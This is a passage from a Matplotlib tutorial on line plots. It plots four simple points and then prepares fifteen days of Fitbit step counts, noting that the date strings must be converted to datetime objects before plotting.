SECTION 3.1.6: XQuery coments It says that "Comments may be used anywhere ignorable whitespace is allowed" but there is no definition of ignorable whitespace, only a reference to section A.2 Lexical rules. The rules in that section are so dense that most readers will find them unintelligible. It would be helpful to provide a reader-friendly definition of "ignorable whitespace". - Steve B. Requests a reader-friendly definition of "ignorable whitespace." Unfortunately I do not know such a definition. The technical definition in Appendix A.2 is referenced. If the submitter of this comment can make this definition reader-friendly, I encourage him to submit a specific wording. SECTION 2.6.5: pragmas Rule [1] Pragma has an attached grammar note gn:parens, but the text of that grammar note does not appear to be relevant, since the grammar note only talks about distinguishing function calls from comments. Perhaps the note needs to talk about doing two character look-ahead to distinguish function calls, comments and pragmas. Though that is still not enough look-ahead, because you also have MUExtensions to distinguish. This requires scanning over indefinitely long whitespace (which might itself be comments) before you come to the keywords "pragma" or "extension". - Steve B. Proposal accepted. Overtaken by events. The referenced grammar note no longer exists. SECTION 2.2.5 : Consistency constraints First bullet: "for every data model node...": what is a "data model node"? I think this term is undefined; I think the term you want is just "node". The second bullet also uses this term. I suggest searching for "data model" and checking that each use is correct. - Steve B. SECTION 2.2.5 : Consistency constraints First sentence: "In order for XQuery to be well defined, the data model, the static context, and the dynamic context must be mutually consistent." This is a misuse of the term "data model". The data model is an abstract framework, whereas the static context and dynamic context are values present in the run-time environment of the evaluation of an XQuery expression. Presumably what you mean is that the data (not the data model) must be consistent with the static and dynamic contexts. Perhaps changing "data model" to "data model instance" in this location would resolve the issue? - Steve B. SECTION 2.2.3.2 : Dynamic evaulation phase The second sentence refers to "the value of the query". "Query" is undefined; perhaps you mean "the value of the expression". - Steve B. SECTION 2.2 : Processing model The paragraph below the figure mentions "an area labeled the external processing domain". Actually, it is labeled just "External Processing". Similarly the label inside the thick black line is "Query Processing", not "query processing domain". - Steve B. SECTION 2.2: processing model First para after figure 1, third sentence: "The external processing domain includes the generation of the data model". But the data model is an abstract framework describing the kind of data found during an XQuery execution. Confer "XQuery 1.0 and XPath 2.0 Data Model" Introduction, second para, for a definition of "data model". If anything "includes the generation of the data model" it has been the W3C group working on that specification. Perhaps what you mean here is "The external processing domain includes the generation of the data." Of course, the data forms a time-varying collection of values, so it might be more accurate to say "The external processing domain includes the generation of the initial values of the data." 
- Steve B. SECTION 2.1.2: dynamic context The definition of "current date and time" refers to "processing of a query or transformation". These are undefined terms. Section 2 "Basics" first sentence says that the "basic building block of XQuery is the expression". What is the relationship between expression, query and transformation? - Steve B. Partially done. All references to "transformation" have been made XPath-only. The assumption is that XSLT users will understand the concept of a transformation, and XQuery users will understand the concept of a query. SECTION 2.1.2: dynamic context It says "the context item is the item currently being processed in a path expression". But a path expression is a piece of syntax, and an item is a value, so an item is not "in" a path expression. I think you mean "the item currently being processed in the evaluation of a path expression". Similarly in the definitions of context position and context size. - Steve B. Fixed as a side effect of processing another comment. These definitions no longer refer to path expressions. SECTION 2.1.1: Static context Validation context: said to be "either global or a context path that starts with the name of a top-level element...". What if there is a top-level element called "global"? I think you mean that the validation context consists of two things: a flag, whose value is "global" or "not global", and a path, which is ignored when the flag is "global". Perhaps saying that the path starts with a QName (not just a "name") would help, if that insures that "global" is never a value of the lexical space of paths. - Steve B. Overtaken by events. "Validation context" no longer exists. SECTION 2.1.1: Static context In-scope collations: it says that "a collation may be regarded...". The use of "a" in "a collation", together with "may", is not clear. Is this universal quantification ("every collation may be regarded..."), existential ("there exists a collation that may be regarded...") or just totally permissive ("perhaps there exists a collation that may be regarded...")? My own interpretation of your words is that you are not trying to prescribe how a collation is implemented, but that, no matter how it is implemented, it shall be open to the interpretation that it is an object with two functions in its interface. This might be better expressed "a collation is effectively an object with two functions...". - Steve B. SECTION 2.1.1: static context In-scope collations: it says that a collation "may be regarded...". Unlike F&O, there is no definition of "may". The F&O definition ("Conforming documents and processors are permitted to, but need not, behave as described") does not seem appropriate here. Is an implementation permitted, but not required, to "regard" a collation as an object with two functions? I don't think an implementation can "regard" anything, since "regarding" is a mental act (though implementers, their product literature and their users might have such a mental model). - Steve B. SECTION 2.1.1: static context I'm unsure if this is a typo in third and fourth "hollow circle" bullets (those for default element/type namespace and default function namespace): "environmentor". Should this be "environment or", or perhaps there is an undefined noun "environmentor", which presumably is something that creates or initializes the environment. - Steve B. SECTION 2.2.3: Expression Processing 2.2.3 refers to type errors, dynamic errors, static errors, which are defined in 2.5.1. 
Suggest adding a line under the first paragraph of 2.2.3 saying "During expression processing, the following errors may be raised .... These errors are defined at 2.5.1" - Steve B. Section 3.12.6 Treat Editorial Provide an example and motivation for treating across. An example for treating across is: the static type is a union of T1 | T2 and you want to pass this to a function that only allows T1. Suggests adding an example of "treat". I think the existing example is adequate. The suggested example uses a notation (T1 | T2) that has not been introduced in the language document. I would prefer to reject this comment. Section 3.12.3 Cast Editorial Use item, sequence of item or atomic value instead of value as appropriate. Suggests avoiding the use of the word "value". Duplicate of comment 2004Jan/0146. I believe that the usages of the word "value" in this section are appropriate, and I think this comment should be rejected. Section 3.12.2 Typeswitch Editorial . If the return expression does not depend on the value of the operand expression, the variable may be omitted from the case or default clause." : Please rewrite along the line of: "If return depends on value, Variable is required, otherwise it does not matter" Sections 3.12.2/3.12.6 Editorial Add link to Sequence Type Matching. Also please attempt to make such references more consistent across the document. Section 3.12 Expressions on SequenceTypes Editorial "This example returns true if the context item is an element node. If the context item is undefined, a dynamic error is raised." : Also add case when context item is not an element node but defined. Section 3.12 Expressions on SequenceTypes Editorial Replace "<a>{5}</a> instance of xs:integer This example returns false because the given value is not an integer; instead, it is an element containing an integer." with "<a>{5}</a> instance of xs:integer This example returns false because the given item is an element and not an integer." Note that the content of the element depends on schema and validation context. Section 3.11 Quantified Expressions Editorial Make the term "effective boolean value" consistent in the document: Either always bold, or always a link. Done. (But in some cases where "effective boolean value" appears multiple times in the same paragraph, I make only the first occurrence a link to avoid a cluttered appearance.) Section 3.11 Quantified Expressions Editorial Replace (("some" "$") | ("every" "$")) VarName with ("some" | "every") "$" VarName In the non-normative grammar. proposal accepted. (Comment is rejected.) We follow Scott's proposal instead. [[rejected]] This is a requested grammar change that was rejected in joint telcon 183 on 5/11/04. Section 3.8.4 Example Editorial/Technical "for $a in fn:distinct-values($books)//author": is not correct. Fn:distinct-values returns a list of atomic values and cannot be used in a path expression. General Comment Examples We should reduce the amount of examples that use // and instead write them with the full path. This is giving a bad example to users in cases where a clear path exists. Eliminated "//" operators from many examples by specifying more explicit paths. This was a fairly extensive change, and people will want to review it carefully during the internal review. Section 3.8.4 Example Editorial "The input bibliography is a list of books in which each book contains a list of authors. 
": Mention that it is bound to the variable $books Section 3.8.3 Order By and Return Clauses Editorial Please add to orderspec rules whether an orderspec may be a union of promotable types (such as xdt:untypedAtomic | xs:string, xs:integer|xs:double). Section 3.8.1 For and Let Clauses Editorial Replace "for $x in $w let $y := f($x) for $z in g($x, $y) return h($x, $y, $z) " with "for $x in $w, $a in f($x) let $y := f($a) for $z in g($x, $y) return h($x, $y, $z) " to show order in for list. Section 3.8.1 For and Let Clauses Editorial "for $i in (1, 2), $j in (3, 4) The tuple stream generated by the above for clause ": Rewrite this into a full XQuery expression. Same for example for "at". Suggests that an example in the For-clause section that illustrates a For-clause should be expanded to a full XQuery expression. I believe this is not necessary and would make the example less clear rather than more clear. Section 3.7.3.7 Computed Namespace Constructor Editorial Wouldn't it be clearer if we move this into a subsection of the element constructor? (see also comment: MS-XQ-LC1-081). Overtaken by events. We no longer have computed namespace node constructors. Sections 3.7.3.5/3.7.3.6 Editorial Show XML serialization of constructed node in examples. Section 3.7.3.2 Computed Attribute Constructor Editorial Replace "The value of the size attribute is "7"." with "The value of the size attribute is "7" of type xdt:untypedAtomic." Sections 3.7.1.*/3.7.3.* Editorial Can some of the constructor rules be expressed by using the fn:string-join() function instead of prose? Suggests an alternative approach to defining element constructors. The would be a big change, but the suggestion is not specific enough to act upon. I do not think there is anything broken about the current definition of element constructors. I would prefer to reject this comment. Section 3.7.3.2 Computed Attribute Constructor Editorial Replace "Atomization is applied to the value of the content expression" with "Atomization is applied to the result of the content expression" Section 3.7.3.1 Computed Element Constructor Editorial The two examples for constructed names seem redundant. Only keep one. Suggests deleting one of the two examples of computed element constructors (does not specify which one). I think both examples are helpful and illustrate different applications of computed constructors. I would prefer to reject this comment. Section 3.7.3.1 Computed Element Constructor Editorial It is not clear if the new element with twice the numeric content is typed or not. Make this clearer. All constructed elements are untyped until they are validated. This is a change since the Last Call document that provoked this comment. I would make no change, and classify this comment as "overtaken by events." Sections 3.7.1.*/3.7.3.* Editorial Can we combine the common construction rules in one place and refer to it in the other? That way we guarantee consistency. Section 3.7.1.4 Whitespace in Element Content Editorial "If xmlspace is not declared in the prolog or is declared as xmlspace = strip, boundary whitespace is not considered significant and is discarded.": Make this sentence dependent on xmlspace policy in static context and not on value in prolog (since that may be given in an implementation-defined place). Section 3.7 Constructors Editorial "Constructors are provided for every kind of node in the data model ([XQuery 1.0 and XPath 2.0 Data Model]). 
": We do not really provide a namespace node constructor, only a namespace declaration component to the element constructor. Overtaken by events. The XQuery document no longer discusses namespace nodes. Section 3.5.3 Node Comparisons Editorial Example: //book[isbn="1558604820"] is //book[call="QA76.9 C3845"] will statically fail. Provide static wording as well, eg exactly-one(//book[isbn="1558604820"]) is exactly-one(//book[call="QA76.9 C3845"]). Same for //purchase[parcel="28-451"] << //sale[parcel="33-870"]. M.Rys requests that a type-safe form of a query example be added. The existing example compares books and parcels with specific keys, intending to suggest that they represent singleton values. Status: Recommend to reject. This is a special case of the working group decision not to require all our examples to be type-safe. Section 3.3.1 Constructing Sequences Editorial Make "In places where the grammar calls for ExprSingle, such as the arguments of a function call, any expression that contains a top-level comma operator must be enclosed in parentheses. " a note. Section 3.3.1 Constructing Sequences Editorial Please replace "A sequence may contain duplicate values or nodes" with "A sequence may contain duplicate atomic values or nodes" Section 3.3.1 Constructing Sequences Editorial Please replace "the resulting values, in order, into a single result sequence" with "the resulting sequences, in order, into a single result sequence". Section 3.2.4 Abbreviated Syntax Editorial Please replace "// is effectively replaced by " with "// is syntactically replaced by ". Otherwise we have a conflict with section 3.2 in the beginning. I don't see any conflict. Section 3.2 states that // is expanded according to the rules in Section 3.2.4, and Section 3.2.4 provides the rules. I think this comment should be rejected. Section 3.2.4 Abbreviated Syntax Editorial Can I write section/@attribute(id)? Please also explain again what child::section/attribute::attribute(id) means. M.Rys requests an explanation of the step attribute::attribute(id). Status: Recommend to reject. I think the description is sufficiently clear. The step searches on the attribute axis to find an attribute named id with any type annotation. Section 3.2.3 Unabbreviated Syntax Editorial ", and otherwise selects nothing" is the case for all expressions. Remove since explained in previous section. (changed "selects nothing" to "returns an empty sequence".) Section 3.2.3 Unabbreviated Syntax Editorial "child::node()": mention that no attributes are returned. Section 3.2.2 Predicates Editorial Please add an example that uses more than one predicate (e.g., E[p1][p2]) and where the second predicate depends on the context of the first predicate. I don't understand "E[p1][p2] where the second predicate depends on the context of the first predicate". Predicates are independent. The result of E is filtered by p1, and the result of E[p1] is filtered again by p2. I think this comment should be rejected. Section 3.2.1.2 Node Tests Editorial "mixed" -> "interleaved" and add definition/reference to definition of "interleaved". Section 3.2.1.1 Axes Editorial "the preceding-sibling axis contains the context node's preceding siblings, those children of the context node's parent that occur before the context node in document order; if the context node is an attribute node or namespace node, the following-sibling axis is empty": replace following-sibling with preceding-sibling Section 3.2.1.1 Axes Editorial XQuery does not really expose namespace nodes. 
Should we remove them from this discussion? XQuery: editorial, minor Section 2.1.1 defines the signature of a function. It is common practice to define the signature of a function as the static types of the arguments and of the results, and to not add the name of the function to it. We suggest we eliminate the name of the function from the signature. Suggests removing function name from function signature in static context. But the name of the function is needed in the static context, and "function signature" is the name we have chosen for this context item. I think this comment should be rejected. XQuery: editorial, minor Section 3.8.3. says: The order by clause is the only facility provided by XQuery for specifying an order other than document order. Therefore, every query in which an order other than document order is required must contain a FLWOR expression, even though iteration would not otherwise be necessary. This statement is not true. The ",", i.e. the sequence concatenation operator creates sequences in other orders then the document order for example. XQuery: editorial, minor Section 3.7.3: references to xs:anyType and xs;anySimpleType have to be replaced with xdt:untyped and xdt:untypedtomic. Done, but some references to xs:anyType and xs:anySimpleType remain in appropriate places. XQuery: editorial, minor Section 3.7.1.3 and 3.7.1.4 talk about the xmlspace declaration in the query's prolog. This should be replaced with the xmlspace property in the static context of the query instead. XQuery: editorial, minor Section 3.2.2 point 1 describes the case where the value of the predicate is numeric. We should make explicit that the two values have to be equal via the eq value comparison. XQuery: editorial, minor Section 2.4.4.3 talks about an element "having the nilability property". This should be replaced with "having the nillability property being true", because all elements have the nillability property (some true, some false). Overtaken by events. This section has been extensively rewritten. XQuery: editorial, minor Section 2.1.2 defines the context item as being the current item being processed as part of a path expression. This should not be limited to path expressions. The current item can be used in any Xquery expression. XQuery: editorial, minor Section 2 third paragraph states that the name of a node is a Qname. It should be an optional Qname. Wants the name of a node to be an "optional QName". Current text states that some nodes have names, and the name of a node is a QName. I believe these two statements, taken together, are accurate and complete. I think this comment should be rejected. XQuery: editorial, major First paragraph in section 2 notes that the language does not allow variable substitution if the definition expression creates new nodes. This is only a particular case where variable substitution (and function inlining in the same time) does not hold, but there are other causes: validation context and element constructors with namespace declarations. This particular "feature" of XQuery that the semantics of an expression depends on the *syntactical* context it is placed in makes XQuery very different from most other programming languages. We should devote some space to explain this "feature" in more details potentially using some examples. 
Dana says that, in the very beginning of the "Basics" section, where we first say that XQuery is a functional language, we should add some examples illustrating obscure reasons why it is not really a functional language after all (because of element constructors with namespace declarations etc.) These examples would depend on features that are not introduced until much later. Status: Recommend to reject. I do not think the proposed examples would be helpful to the reader at this point in the document. I am not sure they would be helpful at all. If Dana feels strongly about this I think she should make a more specific suggestion for material to be added at one or more later points in the document. XQuery: editorial, minor Section 2.4.2 bullet 4 a says: "If an element has type annotation xdt:untypedAtomic...." Our data model doesn't seem to allow this case. XQuery: editorial, minor. The XQuery specification in particular uses Qname in places where an expanded Qname is technically the right terminology. Dana requests some instances of "QName" be changed to "expanded QName". Status: Accepted and implemented. XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 A.1.1 Grammar Notes grammar-note: xml-version "The general rules for [XML 1.1] vs. [XML 1.0], as described in the A.2 Lexical structure section, should be applied to this production." The phrase "general rules" is vague, and doesn't connect well with A.2, which doesn't present rules in its discussion of XML versions. Also, "should be applied to this production" is vague. How about: An implementation's choice to support the XML 1.0 or 1.1 character set determines the external document from which to obtain the definition for this production. But where are the (external) definitions of NCName and QName for XML 1.1 documents? Also, XML 1.0 and 1.1 have the same definition for S, so the gn: xml-version annotation doesn't apply to [11] S. -Michael Dyck XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 A.1.1 Grammar Notes grammar-note: leading-lone-slash "Therefore, a stand-alone slash, in a leading position, that is followed by an operator, will need to be parenthesized in order to stand alone, as in "(/) * 5". "5 * /", on the other hand, is fine." What is a "leading position"? What is an "operator"? If "5 * /" is fine, is "5 * / * 5" fine? This sentence is more than just a helpful note, it actually restricts the language. It should probably be given a different status. -Michael Dyck > Proposed, recommended, or existing response: > Clean up and request approval Accepted, let's make this a normative part of the spec. Scott will take care. Scott's proposal accepted, as amended by correcting inversion of RHS with LHS. Scott's proposal accepted, as amended by correcting inversion of RHS with LHS. XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 A.1.1 Grammar Notes grammar-note: lt "Token disambiguation of the overloaded '<' pattern" Why do you call "<" an "overloaded" pattern? Is it the fact that it occurs in more than one place in the grammar? There are about 24 such patterns. So why single out "<"? Moreover, the leading-lone-slash restriction ensures that there is no ambiguity around the "<" pattern, so there is no (further) disambiguation to do. "The "<" comparison operator can not occur in the same places as a "<" tag open pattern. The "<" comparison operator can only occur in the OPERATOR state and the "<" tag open pattern can only occur in the DEFAULT and the ELEMENT_CONTENT states." 
Note that even if they *could* occur in the same state, it wouldn't matter, because the A.2.2 machine doesn't distinguish the two cases; it simply reports an instance of the "<" pattern. -Michael Dyck No action. Scott will reply. XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 A.1.1 Grammar Notes grammar-note: parens "A look-ahead of one character is required to distinguish function patterns from a QName followed by a comment." Change "comment" to "comment, pragma, or extension". "For example: address (: this may be empty :) may be mistaken for a call to a function named "address" unless this lookahead is employed." It sounds like this lookahead would have to be incorporated into the operation of the A.2.2 machine. If so, that's another way in which A.2.2 is under-defined (see). -Michael Dyck Proposal accepted. It is unclear how the various reference sections have been made up (except for the 'normative reference' section). I suggest to just have 'normative references' and 'non-normative refences'. Regards, Martin. Status: Accepted and on my work list. The xhtml example in 4.6 should use the schema location at W3C, not some arbitrary example location. Regards, Martin. Done by using a different example of an imported schema. The following two text fragments from 4.1 don't really match up: "The version number "1.0" indicates the requirement that the query must be processed by an XQuery Version 1.0 processor." "An XQuery implementation must raise a static error [err:XQ0031] when processing a query labeled with a version that the implementation does not support." If an XQuery 2.0 processor is defined to support both XQuery 1.0 and 2.0, this won't make sense. Regards, Martin. 3.7.4, last paragraph: How can an XQuery programmer make sure that a namespace declaration is included so that the xs namespace prefix in the example is declared in the output? There has to be a clear way to do that. Regards, Martin. in A.4, precedence order, in item 2, please streamline, i.e. "for, some, every, if, or". Also, please add () at the bottom, and please change "(comma)" to ", (comma)" or so. Regards, Martin. Proposal accepted. in A.2.1, "words" isn't clearly defined. Regards, Martin. XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 A.1 EBNF It would be good if some groups of related symbols were named more consistently. Specifically... -------- 'content characters': ElementContentChar (no change) QuotAttrContentChar (no change) AposAttrContentChar (no change) ExprCommentContentChar instead of ExprCommentContent PragmaContentChar instead of PragmaContents ExtensionContentChar instead of ExtensionContents (Mind you, I've elsewhere suggested renaming ExprComment as just Comment, so that would give you CommentContentChar.) 
-------- computed constructors: CompDocConstructor (no change) CompElemConstructor (no change) CompNSConstructor (no change) CompAttrConstructor (no change) CompTextConstructor (no change) CompCommentConstructor instead of CompXmlComment CompPIConstructor instead of CompXmlPI -------- direct constructors: DirElemConstructor (no change) DirAttributeList instead of AttributeList DirAttributeValue instead of AttributeValue DirElemContent instead of ElementContent DirCommentConstructor instead of XmlComment DirPIConstructor instead of XmlPI DirCdataSectionConstructor instead of CDataSection or else: XmlElement instead of DirElemConstructor XmlAttributeList instead of AttributeList XmlAttributeValue instead of AttributeValue XmlElementContent instead of ElementContent XmlComment (no change) XmlPI (no change) XmlCdataSection instead of CDataSection -Michael Dyck Seems like goodness to me, worth the trouble? Accepted, apart from the DirCdataSectionConstructor instead of CDataSection (which has gone anyway). Scott will tackle this. XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 3.7 Constructors, A.1 EBNF I think it would be an improvement if you changed [80] Constructor ::= DirElemConstructor | ComputedConstructor | XmlComment | XmlPI | CDataSection to [80] Constructor ::= DirectConstructor | ComputedConstructor [new] DirectConstructor ::= DirElemConstructor | XmlComment | XmlPI | CDataSection This would better reflect the division between computed and direct constructors. Incidentally, it would also mean that you could change: [109] ElementContent ::= ElementContentChar | "{{" | "}}" | DirElemConstructor | EnclosedExpr | CDataSection | CharRef | PredefinedEntityRef | XmlComment | XmlPI to just: [109] ElementContent ::= DirectConstructor | ElementContentChar | "{{" | "}}" | CharRef | PredefinedEntityRef | EnclosedExpr ------------------------------------------------------------------------ Moreover, if you introduced [new] CommonContent ::= PredefinedEntityRef | CharRef | "{{" | "}}" | EnclosedExpr then you could eliminate a bunch of repetition in [109,112,113]: [109] ElementContent ::= DirectConstructor | ElementContentChar | CommonContent [112] QuotAttrValueContent ::= QuotAttrContentChar | CommonContent [113] AposAttrValueContent ::= AposAttrContentChar | CommonContent -Michael Dyck Seems like goodness to me, worth the trouble? Accepted. Scott and Don will tackle this. XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 A.1 EBNF It would be more helpful to the reader if you presented the productions in an order such that: (1) The definition for a symbol is close to (and after) its uses (except for ubiquitous symbols like ExprSingle and TypeDeclaration). (2) Definitions for related symbols are close. 
Of course, there are tradeoffs involved, but here is an ordering that I believe fulfills these two desiderata better than the current ordering: ------------------------------------ [30] Module [36] VersionDecl [31] MainModule [32] LibraryModule [33] ModuleDecl [34] Prolog [35] Separator [118] NamespaceDecl [115] XMLSpaceDecl [119] DefaultNamespaceDecl [116] DefaultCollationDecl [117] BaseURIDecl [146] SchemaImport [147] SchemaPrefix [37] ModuleImport [38] VarDecl [145] ValidationDecl [120] FunctionDecl [121] ParamList [122] Param [114] EnclosedExpr [39] QueryBody [40] Expr [41] ExprSingle [42] FLWORExpr [43] ForClause [44] PositionalVar [45] LetClause [46] WhereClause [47] OrderByClause [48] OrderSpecList [49] OrderSpec [50] OrderModifier [51] QuantifiedExpr [52] TypeswitchExpr [53] CaseClause [54] IfExpr [55] OrExpr [56] AndExpr [57] InstanceofExpr [58] TreatExpr [59] CastableExpr [60] CastExpr [61] ComparisonExpr [82] GeneralComp [83] ValueComp [84] NodeComp [62] RangeExpr [63] AdditiveExpr [64] MultiplicativeExpr [65] UnaryExpr [66] UnionExpr [67] IntersectExceptExpr [68] ValueExpr [78] ValidateExpr [69] PathExpr [70] RelativePathExpr [71] StepExpr [72] AxisStep [85] ForwardStep [89] ForwardAxis [87] AbbrevForwardStep [86] ReverseStep [90] ReverseAxis [88] AbbrevReverseStep [91] NodeTest [92] NameTest [93] Wildcard [73] FilterStep [77] Predicates [75] PrimaryExpr [94] Literal [95] NumericLiteral [76] VarRef [96] ParenthesizedExpr [74] ContextItemExpr [97] FunctionCall [80] Constructor [81] ComputedConstructor [99] CompDocConstructor [100] CompElemConstructor [101] CompNSConstructor [102] CompAttrConstructor [105] CompTextConstructor [104] CompXmlComment [103] CompXmlPI [98] DirElemConstructor [110] AttributeList [111] AttributeValue [112] QuotAttrValueContent [113] AposAttrValueContent [109] ElementContent [108] XmlComment [107] XmlPI [106] CDataSection [124] SingleType [123] TypeDeclaration [125] SequenceType [144] OccurrenceIndicator [127] ItemType [126] AtomicType [128] KindTest [141] AnyKindTest [138] DocumentTest [140] TextTest [139] CommentTest [137] PITest [130] AttributeTest [129] ElementTest [135] AttribNameOrWildcard [134] ElementNameOrWildcard [136] TypeNameOrWildcard [132] AttributeName [131] ElementName [133] TypeName [79] SchemaContext [143] SchemaContextLoc [142] SchemaContextPath ------------------------------------ [18] PITarget [20] VarName [12] SchemaMode [13] SchemaGlobalTypeName [14] SchemaGlobalContext [15] SchemaContextStep [7] IntegerLiteral [8] DecimalLiteral [9] DoubleLiteral [16] Digits [10] StringLiteral [22] PredefinedEntityRef [24] CharRef [23] HexDigits [17] EscapeQuot [25] EscapeApos [27] ElementContentChar [28] QuotAttrContentChar [29] AposAttrContentChar [3] ExprComment [4] ExprCommentContent [1] Pragma [5] PragmaContents [2] MUExtension [6] ExtensionContents [21] QName [19] NCName [11] S [26] Char ------------------------------------ -Michael Dyck Don't think it's quite worth the trouble, begs the issue of whether tokens should be separated out or not. But I'm willing. Accepted. Scott will tackle this. Dear Colleagues, This comment pertains to the Nov. 12 2003 version of XPath 2.0 [1]. [1] Lisa Martin, on behalf of the XML Schema Working Group ---------------------------------------------------- Section 2.4.4 Sequence Type Matching In the definition of type-matches in 2.4.4, known and unknown derived types are treated differently with respect to derivation by extension and restriction. 
Implementations are free to return true if they can determine that unknown types are derived by restriction but not if they are derived by extension or a mix of extension and restriction steps, whereas known types will return true if derived by any means. If this non-parallelism is intentional, an explanatory note might help avoid confusion on the part of readers. If it is not intentional, it should be fixed. In addition, the rules are careful to say "derived by one or more steps of restriction or extension" but say simply "derived by restriction". Is it intended that this be confined to a single derivation step? Or would one or more restriction steps be OK? This comment is about the definition of the "type-matches" pseudo-function, which has been replaced by a new pseudo-function named "derives-from" with a new definition. I believe that the new definition addresses the issue raised by this comment. I consider this comment to be "overtaken by events." XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 Here is a comment from that did not receive a response from the WG. ------ A.4 Precedence Order "In the cases where a number of operators are a choice at the same production level, the expressions are always evaluated from left to right." The phrase "a choice at the same production level" is vague. And the order in which the *expressions* are evaluated is immaterial. For example, in the AdditiveExpr A - B - C, the order in which you evaluate A, B, and C doesn't matter (except in the presence of dynamic errors); what matters (when you're defining precedence) is the order in which you evaluate the subtractions. Here's something that addresses these points, and comes closer to using standard terminology: When a production directly derives a sequence of expressions separated by binary operators, the operators are evaluated from left to right. In any event, an example might help. -Michael Dyck Scott's proposal goes too far. Among operators at the same precedence level, operators must be applied from left to right (otherwise minus becomes nondeterministic). Amended proposal is accepted. Scott's original proposal goes too far. Among operators at the same precedence level, operators must be applied from left to right (otherwise minus becomes nondeterministic). Amended proposal is accepted. XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 Here is a comment from that did not receive a response from the WG. ------ A.1 EBNF [17] EscapeQuote ::= '"' '"' For the right-hand side, why not just '""'? (Note that EscapeApos is "''".) -Michael Dyck Closed as duplicate of 2004Feb0411. Duplicate of 2004Feb0411 XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 Here are some comments from that did not receive a response from the WG. It turns out that, in my recent submission: I already re-stated many of the unanswered comments from the Nov 2002 posting. These two are the remainder. ------ A.2.1 White Space Rules "white space is needed to disambiguate the token" In my recent posting, I suggested changing "token" to "grammar". But I think I prefer what I said in Nov 2002: The phrase "disambiguate the token" is, I believe, a misuse of the concept of ambiguity. At any rate, I think it would be plainer and more accurate to say that whitespace is needed to prevent two adjacent tokens from being (mis-)recognized as one. For instance, consider the character-sequence a- b Note that there is a space before the 'b'. 
It thus has only one derivation from Module (the "a minus b" one), so there is no ambiguity involved, no disambiguation needed. Nevertheless, it is still a case in which (I assume) whitespace is needed between 'a' and '-' to prevent the longest-match rule from (mis-)recognizing 'a-' as a QName. "Special whitespace notation" Note that only the *notation* is special. The treatment of whitespace characters in "ws: explicit" and "ws: significant" productions is *not* special: they treat them like any other character, just as the XML spec does. It's the *unmarked* productions that have special interpretation with respect to whitespace. -Michael Dyck Proposal accepted. XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 Here are some comments from that did not receive a response from the WG. ------ A.1 EBNF "The following grammar uses the same Basic Extended Backus-Naur Form (EBNF) notation as [XML 1.0], except that grammar symbols always have initial capital letters." I still wonder what the reason for this exception is. And that isn't the only difference from the notation used in XML. In fact, you immediately discuss two others -- the <> terminal groupings, and the /**/ production comments. Another is the use (in prodns [11,19,21,26]) of references to symbols in other specifications. Maybe you could just change "except that" to something like "with the following minor differences". Also (this isn't actually a leftover comment, but while I'm here): there's no reason to capitalize the word "Basic". The XML spec itself uses the word "simple". (These comments also apply to a similar sentence in 1 Introduction.) ----- A.2 Lexical structure "The rules for calculating these states are given in the A.2.2 Lexical Rules section." No, A.2.2 does not give rules for calculating the states. -Michael Dyck Adapt "Symbols are written with an initial capital letter if they are the start symbol of a regular language, otherwise with an initial lower case letter."? Also, be more specific about differences with EBNF in XML? Worth the work? On the A.1 EBNF part: ok, accepted, Scott will take this action up. Don: also note in the intro of the lang book "Grammar symbols have initial caps" etc, should I delete this? Scott: yes.
http://www.w3.org/2005/04/xquery-issues.html
CC-MAIN-2021-39
en
refinedweb
When the demand on a server increases or decreases, it is desirable to change the resources dedicated to the server. The available options range from manually managed threads, which allow concurrent behavior, to specialized classes that handle thread pools and NIO channels. In this section, we will use threads to augment our simple echo server. The definition of the ThreadedEchoServer class is as follows. It implements the Runnable interface so that a new thread can be created for each connection. The private Socket variable will hold the client socket for a specific thread:
public class ThreadedEchoServer implements Runnable {
    private static Socket clientSocket;
    public ThreadedEchoServer(Socket clientSocket) ...
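The Java listing is truncated at this point in the excerpt. As a rough illustration of the same one-thread-per-connection idea, here is a minimal sketch in Python rather than the book's Java; the port number and buffer size are arbitrary choices, not values from the book.

# Thread-per-connection echo server sketch (a Python analogue, not the book's code).
import socket
import threading

def handle_client(client_socket):
    # Echo everything received back to the client until the connection closes.
    with client_socket:
        while True:
            data = client_socket.recv(1024)   # buffer size chosen arbitrarily
            if not data:
                break
            client_socket.sendall(data)

def main():
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind(("", 6000))                   # port chosen arbitrarily
    server.listen()
    print("Threaded echo server waiting for connections...")
    while True:
        client, _address = server.accept()
        # Start one new thread per accepted connection, mirroring the Runnable-per-socket pattern.
        threading.Thread(target=handle_client, args=(client,), daemon=True).start()

if __name__ == "__main__":
    main()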
https://www.oreilly.com/library/view/learning-network-programming/9781785885471/ch01s06.html
CC-MAIN-2019-26
en
refinedweb
Line Plots using Matplotlib
Mar 4
Key Terms: line plot, datetime
Import Modules
import matplotlib.pyplot as plt
from datetime import datetime
%matplotlib inline
Generate a Simple Line Plot
We call the plot method and must pass in at least two arguments: the first is our list of x-coordinates, and the second is our list of y-coordinates.
plt.plot([1, 2, 3, 4], [1, 2, 3, 4]);
We plotted 4 points with a line connected through them.
Generate a Line Plot from My Fitbit Activity Data
More often, you'll be asked to generate a line plot to show a trend over time. Below is my Fitbit activity of steps for each day over a 15 day time period.
dates = ['2018-02-01', '2018-02-02', '2018-02-03', '2018-02-04', '2018-02-05', '2018-02-06', '2018-02-07', '2018-02-08', '2018-02-09', '2018-02-10', '2018-02-11', '2018-02-12', '2018-02-13', '2018-02-14', '2018-02-15']
steps = [11178, 9769, 11033, 9757, 10045, 9987, 11067, 11326, 9976, 11359, 10428, 10296, 9377, 10705, 9426]
Convert Strings to Datetime Objects
In our plot, we want dates on the x-axis and steps on the y-axis. However, Matplotlib does not allow strings - the data type in our dates list - to be plotted directly. We must convert the date strings into datetime objects.
Code Explanation
